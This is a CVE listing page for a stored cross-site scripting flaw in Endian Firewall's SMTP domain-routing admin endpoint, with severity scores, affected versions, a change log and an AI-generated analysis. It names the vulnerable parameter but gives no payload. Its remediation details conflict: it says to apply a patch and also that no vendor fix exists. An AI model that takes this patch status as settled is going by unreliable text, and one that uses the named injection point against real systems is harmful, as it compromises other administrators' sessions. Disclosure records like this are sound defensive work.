Description
Endian Firewall version 3.3.25 and prior allow stored cross-site scripting (XSS) via the domain parameter to /manage/smtpscan/domainrouting/. An authenticated attacker can inject arbitrary JavaScript that is stored and executed when other users view the affected page.
Published: 2026-04-02
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting
Action: Apply Patch
AI Analysis

Impact

This vulnerability permits a stored cross‑site scripting attack through the domain parameter in the /manage/smtpscan/domainrouting endpoint. An attacker who can authenticate to the system can inject arbitrary JavaScript that is stored in the database and executed each time other users view the affected page, potentially compromising their session cookies, defacing the interface, or exfiltrating data.

Affected Systems

The flaw affects Endian Firewall versions 2.1.2, 2.4, 3.3.25, and the community edition. All deployments of these versions are vulnerable until patched.

Risk and Exploitability

With a CVSS score of 5.1 the vulnerability presents moderate severity. The EPSS score of less than 1% indicates a low probability of exploitation, and it is not listed in CISA’s KEV catalog. An attacker must have authenticated access to the firewall’s web interface, after which the stored XSS payload is delivered to other users. Because the payload is executed in the context of other users’ browsers, compromises can occur without further network access.

Generated by OpenCVE AI on April 6, 2026 at 19:44 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the latest Endian Firewall release that addresses the stored XSS issue.
  • If an immediate patch is not available, restrict or disable the /manage/smtpscan/domainrouting endpoint and limit access to trusted administrators.

Generated by OpenCVE AI on April 6, 2026 at 19:44 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 06 Apr 2026 16:45:00 +0000

Type Values Removed Values Added
First Time appeared Endian firewall Community
CPEs cpe:2.3:a:endian:firewall_community:*:*:*:*:*:*:*:*
Vendors & Products Endian firewall Community

Thu, 02 Apr 2026 20:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 02 Apr 2026 15:15:00 +0000

Type Values Removed Values Added
Description Endian Firewall version 3.3.25 and prior allow stored cross-site scripting (XSS) via the domain parameter to /manage/smtpscan/domainrouting/. An authenticated attacker can inject arbitrary JavaScript that is stored and executed when other users view the affected page.
Title Endian Firewall /manage/smtpscan/domainrouting/ domain Stored Cross-Site Scripting
First Time appeared Endian
Endian firewall
Weaknesses CWE-79
CPEs cpe:2.3:a:endian:firewall:2.1.2:*:*:*:*:*:*:*
cpe:2.3:a:endian:firewall:2.4:*:*:*:*:*:*:*
cpe:2.3:a:endian:firewall:3.3.25:*:*:*:*:*:*:*
Vendors & Products Endian
Endian firewall
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

cvssV4_0

{'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N'}

Subscriptions

Endian Firewall Firewall Community
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-04-02T15:37:51.767Z

Reserved: 2026-03-30T20:26:18.726Z

Link: CVE-2026-34816

cve-icon Vulnrichment

Updated: 2026-04-02T15:37:41.562Z

cve-icon NVD

Status : Analyzed

Published: 2026-04-02T15:16:50.073

Modified: 2026-04-06T16:13:01.423

Link: CVE-2026-34816

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-07T07:56:12Z

Weaknesses